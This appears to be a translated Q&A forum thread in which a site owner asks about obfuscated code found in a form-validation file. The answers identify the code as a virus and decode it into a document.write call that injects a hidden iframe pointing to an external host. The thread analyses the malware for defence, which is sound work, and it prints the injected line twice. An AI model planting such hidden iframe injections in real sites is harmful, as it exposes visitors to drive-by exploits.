我的一个表单验证文件,我发现了以下代码(见下文) 我的朋友在扫描我的网站时指出了它,说它是病毒。
但它到底是什么?
问问题
852 次
2 回答
5
一种病毒。我在数组文字中包含一些带有 Unicode 转义字符的字符串,第一个是一些 html,第二个是"write". 然后,document[arr[1]](arr[0])执行,转换为以下内容:
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
我不知道(也不会检查)这些 iframe 包含什么,可能会有一些漏洞利用。
此外,代码确实包含(在这两个 iframe 写入之间)一些函数(_1lO和O0l),这些函数可能在IlO字符串被编辑之前对字符串进行转义eval(是的,eval 是邪恶的!:-),但是你的 pastebin 前面有一些缺失的代码片段,所以我无法告诉你他们到底做了什么。你能给我们完整的剧本吗?
于 2012-08-05T22:24:18.523 回答
3
这是一种混淆病毒。所有这些东西的某个地方将是一个 eval()。如果您想知道它到底做了什么,您将不得不解码这些部分并查看。
更有趣的是,这些东西是如何在你的代码中结束的。
于 2012-08-05T22:25:11.737 回答